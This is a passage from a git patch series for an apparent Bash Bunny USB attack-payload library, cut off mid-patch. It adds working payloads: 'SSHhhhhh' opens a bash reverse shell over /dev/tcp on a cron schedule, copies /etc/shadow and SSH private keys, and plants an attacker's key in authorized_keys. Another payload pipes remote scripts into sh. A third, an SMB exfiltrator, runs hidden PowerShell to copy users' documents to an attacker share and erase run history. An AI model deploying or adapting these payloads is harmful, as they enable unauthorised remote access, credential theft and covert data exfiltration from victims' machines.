200 + QUACK ENTER +fi LED SUCCESS #See you, space cowboy... \ No newline at end of file diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt index ec03ae26..5f87625a 100644 --- a/payloads/library/credentials/darkCharlie/injector/payload.txt +++ b/payloads/library/credentials/darkCharlie/injector/payload.txt @@ -62,13 +62,13 @@ then QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh QUACK ENTER QUACK DELAY 200 - QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh + QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh" QUACK ENTER QUACK DELAY 200 QUACK STRING curl "http://$HOST_IP/post.sh" \| sh QUACK ENTER QUACK DELAY 200 - QUACK STRING ~/.config/ssh/ssh --initializeScript + QUACK STRING python "~/.config/ssh/ssh" --initializeScript QUACK ENTER QUACK DELAY 200 else @@ -89,7 +89,13 @@ fi QUACK DELAY 200 QUACK ENTER QUACK DELAY 200 -QUACK STRING exit -QUACK DELAY 200 -QUACK ENTER +if [ "$mac" = true ] +then + QUACK DELAY 5000 #seems like macs need some extra time on this + QUACK GUI w +else + QUACK STRING exit + QUACK DELAY 200 + QUACK ENTER +fi LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20 From 3ed306ef999d0b3d1a2d842f20287d4de6b9c9de Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:51:04 -0400 Subject: [PATCH 07/56] Added SSHhhhhh (Linux) to the library Plant your RSA key into the victim's authorized_keys, schedule a reverse shell via CRON and grab the contents of the .ssh folder. --- .../remote_access/SSHhhhhh (Linux)/boom.sh | 47 +++++++++++++++++ .../SSHhhhhh (Linux)/payload.txt | 52 +++++++++++++++++++ .../remote_access/SSHhhhhh (Linux)/readme.md | 24 +++++++++ 3 files changed, 123 insertions(+) create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/readme.md diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh new file mode 100644 index 00000000..11ecc635 --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh @@ -0,0 +1,47 @@ +#!/bin/bash + +# Main Payload + +# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc.. +REVERSESHELL=true +LHOST='10.20.20.104' # Reverse Shell listening host IP +LPORT='4444' # Reverse Shell listening host port +CRON='30 */1 * * *' # Just the timing portion of the CRON job +RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2' +ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces +DT=$(date "+%Y.%m.%d-%H.%M.%S") +DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT + +if [ "$REVERSESHELL" = true ] ; then + # Create reverse shell script + echo "#!/bin/bash"> .config/rs.sh ; + echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ; + chmod +x /home/$USER/.config/rs.sh ; + + # Add task to CRON that launches the Reverse_TCP script on a schedule for persistence + crontab -l > crontab.tmp ; + if grep -Fq .config/rs.sh crontab.tmp; then + echo 'Update in progress.' + else + echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ; + crontab crontab.tmp ; + fi + rm -f crontab.tmp ; +fi + +# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later) +mkdir $DN ; +ip addr > $DN/ip-addr.txt ; +whoami > $DN/whoami.txt ; +cat /etc/passwd > $DN/etc-passwd.txt ; +cat /etc/shadow > $DN/etc-shadow.txt ; +uname -a > $DN/uname-a.txt ; +route -n > $DN/route-n.txt ; +cp /home/$USER/.ssh/* $DN/. ; + +# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence +if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then + echo 'Update almost completed.' +else + echo $RSA_KEY >> .ssh/authorized_keys ; +fi diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt new file mode 100644 index 00000000..e7548d8e --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt @@ -0,0 +1,52 @@ +# Title: SSHhhhhh +# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors +# Author: WWVB +# Props: Hak5Darren +# Version: 1.0 +# Category: Exfiltration w/Persistence +# Target: Linux Ubuntu 18.04 LTS +# Attackmodes: HID, Storage + +#!/bin/bash + +LED SETUP +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +LED STAGE1 +QUACK DELAY 500 +QUACK CTRL-ALT t +QUACK DELAY 100 + +# Drop primary payload on the box +QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh . +QUACK ENTER +QUACK DELAY 50 + +QUACK STRING chmod +x boom.sh +QUACK ENTER +QUACK DELAY 50 + +LED ATTACK + +# Light the fuse and wait!! +QUACK STRING ./boom.sh +QUACK ENTER +QUACK DELAY 1000 + +# Cleanup +LED CLEANUP +QUACK STRING rm boom.sh +QUACK ENTER +QUACK DELAY 100 + +# Bye Felicia! +QUACK STRING umount '/media/$USER/BashBunny' +QUACK ENTER +QUACK DELAY 25 + +QUACK STRING exit +QUACK ENTER +QUACK DELAY 25 + +LED FINISH diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md new file mode 100644 index 00000000..1eb09821 --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -0,0 +1,24 @@ +# SSHhhhhh + +# Author: WWVB +# Version: Version 1.0 + +# Description + +# Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) + Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) + +# Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) + whoami + ip addr + route -n + /etc/passwd + /etc/shadow (on the off chance you get a root terminal) + uname -a + + Two opportunites for persistence are injected: + Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) + Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job + added that calls it on a schedule (aka Call Me Later) + +# Configuration = HID STORAGE From c52ce015de9bb83d31a1486783e3ec665dca704d Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:52:28 -0400 Subject: [PATCH 08/56] Update readme.md --- .../library/remote_access/SSHhhhhh (Linux)/readme.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 1eb09821..7d6889f2 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -1,14 +1,14 @@ # SSHhhhhh -# Author: WWVB -# Version: Version 1.0 +## Author: WWVB +## Version: Version 1.0 -# Description +## Description -# Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) +## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) -# Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) +## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami ip addr route -n @@ -21,4 +21,4 @@ Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) -# Configuration = HID STORAGE +## Configuration = HID STORAGE From 3ee2668f7e2c4a480302fb1e0725ea0356cd60d7 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:53:57 -0400 Subject: [PATCH 09/56] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 7d6889f2..8ef28aba 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,19 +6,19 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) - Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) - whoami - ip addr - route -n - /etc/passwd - /etc/shadow (on the off chance you get a root terminal) - uname -a +whoami +ip addr +route -n +/etc/passwd +/etc/shadow (on the off chance you get a root terminal) +uname -a - Two opportunites for persistence are injected: - Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) - Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job - added that calls it on a schedule (aka Call Me Later) +Two opportunites for persistence are injected: +Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) +Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job + added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From d31b0174b74cbd55e977cb9790a4ab5e5881652d Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:56:37 -0400 Subject: [PATCH 10/56] Update readme.md --- .../library/remote_access/SSHhhhhh (Linux)/readme.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 8ef28aba..f2e59109 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -9,12 +9,12 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) -whoami -ip addr -route -n -/etc/passwd -/etc/shadow (on the off chance you get a root terminal) -uname -a + whoami + ip addr + route -n + /etc/passwd + /etc/shadow (on the off chance you get a root terminal) + uname -a Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From fa33a23a72af1b1c957ad682682592f22ab16716 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:57:48 -0400 Subject: [PATCH 11/56] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 21 +++++++++---------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index f2e59109..8a2e74d0 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,19 +6,18 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) - whoami - ip addr - route -n - /etc/passwd - /etc/shadow (on the off chance you get a root terminal) - uname -a +### whoami +### ip addr +### route -n +### /etc/passwd +### /etc/shadow (on the off chance you get a root terminal) +### uname -a -Two opportunites for persistence are injected: -Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) -Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job - added that calls it on a schedule (aka Call Me Later) +###Two opportunites for persistence are injected: +###Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) +###Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From 32d7801f0ea4c01e9576bbf8fc4d841f3af79eae Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:59:09 -0400 Subject: [PATCH 12/56] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 25 ++++++++++++------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 8a2e74d0..d679a838 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -9,15 +9,22 @@ ###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) -### whoami -### ip addr -### route -n -### /etc/passwd -### /etc/shadow (on the off chance you get a root terminal) -### uname -a + whoami + + ip addr + + route -n + + /etc/passwd + + /etc/shadow (on the off chance you get a root terminal) + + uname -a -###Two opportunites for persistence are injected: -###Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) -###Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) +Two opportunites for persistence are injected: + + Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) + + Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From 470fd8a0cea1f41a562d062fac6dd76dfe40ee4c Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:00:28 -0400 Subject: [PATCH 13/56] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index d679a838..efa9e49e 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,7 +6,7 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami @@ -21,7 +21,7 @@ uname -a -Two opportunites for persistence are injected: +##Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From 40a9afa7c47a8d343ef3314a59e4ce3ef0d2eaae Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:01:09 -0400 Subject: [PATCH 14/56] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index efa9e49e..944aaaf9 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -21,7 +21,7 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not install uname -a -##Two opportunites for persistence are injected: +## Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From 230a677aa3acf64fa31f1ae1c5d087234f047b23 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:42:49 -0400 Subject: [PATCH 15/56] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 944aaaf9..5fdc0c34 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,7 +6,7 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami From f9d4737fc0f4cc2d5c77fbee5f4fe83b5fdb12cc Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Thu, 28 Mar 2019 10:30:47 -0400 Subject: [PATCH 16/56] Added ARP data to the loot --- payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh index 11ecc635..a1b7fc82 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh @@ -33,6 +33,7 @@ fi mkdir $DN ; ip addr > $DN/ip-addr.txt ; whoami > $DN/whoami.txt ; +cat /proc/net/arp > $DN/arp.txt ; cat /etc/passwd > $DN/etc-passwd.txt ; cat /etc/shadow > $DN/etc-shadow.txt ; uname -a > $DN/uname-a.txt ; From 16efe8b05beeb54957e2c5675b5d553444d184a1 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Thu, 28 Mar 2019 10:31:55 -0400 Subject: [PATCH 17/56] Added ARP to loot --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 5fdc0c34..8f1064aa 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -13,6 +13,8 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not install ip addr + arp data + route -n /etc/passwd From 83f8d9cb43e35c533c3c2b96a8725e7a3d7637bc Mon Sep 17 00:00:00 2001 From: WWVB Date: Thu, 27 Jun 2019 20:20:28 -0400 Subject: [PATCH 18/56] Renamed directory to remove space. --- .../remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/boom.sh | 0 .../{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/payload.txt | 0 .../{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/readme.md | 0 3 files changed, 0 insertions(+), 0 deletions(-) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/boom.sh (100%) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/payload.txt (100%) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/readme.md (100%) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh rename to payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt rename to payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/readme.md rename to payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md From e98de70531869902c3479243481befaef5fcb60a Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:44:48 -0500 Subject: [PATCH 19/56] Create file.txt --- payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt @@ -0,0 +1 @@ + From 5bc816094644b5cfd0b64f814ac519e94673dbe5 Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:45:41 -0500 Subject: [PATCH 20/56] Add files via upload --- .../smb_exfiltratorV2.0/README.md | 59 +++++++++++++ .../smb_exfiltratorV2.0/payload.txt | 85 +++++++++++++++++++ .../exfiltration/smb_exfiltratorV2.0/s.ps1 | 9 ++ 3 files changed, 153 insertions(+) create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/README.md create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md new file mode 100644 index 00000000..14549d41 --- /dev/null +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -0,0 +1,59 @@ +# Faster SMB Exfiltrator V 2.0 + +* Author: Hak5Darren +* Props: ImNatho, mike111b, madbuda, jblk01 +* Version: Version 1.6.1 +* Target: Windows XP SP3+ (Powershell) +* Category: Exfiltration +* Attackmodes: HID, Ethernet + +## Description + +Exfiltrates select files from users's documents folder via SMB. +Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME + +Rewrite of the original SMB Exfiltrator payload with: +* Faster copying, using robocopy multithreaded mode +* Faster finish, using a EXFILTRATION_COMPLETE file +* Offload logic to target PC for accurate date/time +* Clears tracks by default. +* Test-Connection handling by ICMP (no lame sleeps) +* Hidden powershell window by default + + +## Configuration + +Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired. + +## STATUS + +| LED | Status | +| ------------------- | -------------------------------------- | +| Red (blinking) | Impacket not found in /pentest | +| Yellow Single | Ethernet Stage | +| Yellow Double | HID Stage | +| Cyan | Receiving files | +| White | Moving liberated files to mass storage | +| Green | Finished | + +## NOTICE + +# As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share. +# To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files. + +## Starting from a fresh Bash Bunny + +# 1. apt update ; apt install gcc +# 2. pip install impacket +# 3. cd /tools/ +# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz +# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ +# 6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password' + +# Both the username and the password have been set as 'user' and 'Password01' respectively. + +# Changes to the payload.txt include: + + # Support for SMB version 2 enabled. + # Username and password set to bypass Microsoft's disallowing of anonymous access. + # Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt new file mode 100644 index 00000000..774900ae --- /dev/null +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt @@ -0,0 +1,85 @@ +#!/bin/bash +# +# Title: Faster SMB Exfiltrator version 2.0 +# Author: Hak5Darren +# Props: ImNatho, mike111b, madbuda, jblk01 +# Version: 1.6.1 +# Category: Exfiltration +# Target: Windows XP SP3+ (Powershell) +# Attackmodes: HID, Ethernet +# +# REQUIREMENTS +# ============ +# SETUP: +# +# 1. apt update ; apt install gcc +# 2. pip install impacket +# 3. cd /tools/ +# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz +# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ +# +# +# LED STATUS +# ========== +# FAIL........Failed to find dependencies +# STAGE1......Ethernet Stage +# STAGE2......HID Stage +# SPECIAL.....Receiving Files +# CLEANUP.....Moving Liberated Files +# FINISH......Finished +# +# OPTIONS +# ======= +# Exfiltration options configured from included s.ps1 script + + +######## INITIALIZATION ######## +REQUIRETOOL impacket +GET SWITCH_POSITION +# Make temporary loot directory +mkdir -p /loot/smb/ +# Delete any old exfiltration data +rm -rf /loot/smb/* +# Copy new powershell payload to smb share +cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ +# Make loot directory on USB Disk +mkdir -p /root/udisk/loot/smb_exfiltrator + + +######## ETHERNET STAGE ######## +LED STAGE1 +ATTACKMODE RNDIS_ETHERNET +# Start the SMB Server +python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & + + +######## HID STAGE ######## +# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 +GET HOST_IP +LED STAGE2 +ATTACKMODE HID RNDIS_ETHERNET +RUN WIN powershell +Q DELAY 1000 +Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit" +Q DELAY 500 +Q ENTER +LED SPECIAL +# Wait until files are done copying +while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done + + +######## CLEANUP ######## +LED CLEANUP +# Delete EXFILTRATION_COMPLETE file +rm -rf /loot/smb/EXFILTRATION_COMPLETE +# Move files to udisk loot directory +mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator +# Clean up temporary loot directory +rm -rf /loot/smb/e/* +# Sync file system +sync + + +######## FINISH ######## +# Trap is clean +LED FINISH diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 b/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 new file mode 100644 index 00000000..73f1c999 --- /dev/null +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 @@ -0,0 +1,9 @@ +$exfil_dir="$Env:UserProfile\Documents" +$exfil_ext="*.docx" +$exfil_ext1="*.pdf" +$exfil_ext2="*.xlsx" +$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" +mkdir $loot_dir +robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z +New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue From 4ac760772ac3894e9642ad637fafb9955146e911 Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:46:12 -0500 Subject: [PATCH 21/56] Delete file.txt --- payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt | 1 - 1 file changed, 1 deletion(-) delete mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt deleted file mode 100644 index 8b137891..00000000 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt +++ /dev/null @@ -1 +0,0 @@ - From 90ad58048504d2de20d792fc516ed1a36090176e Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:47:36 -0500 Subject: 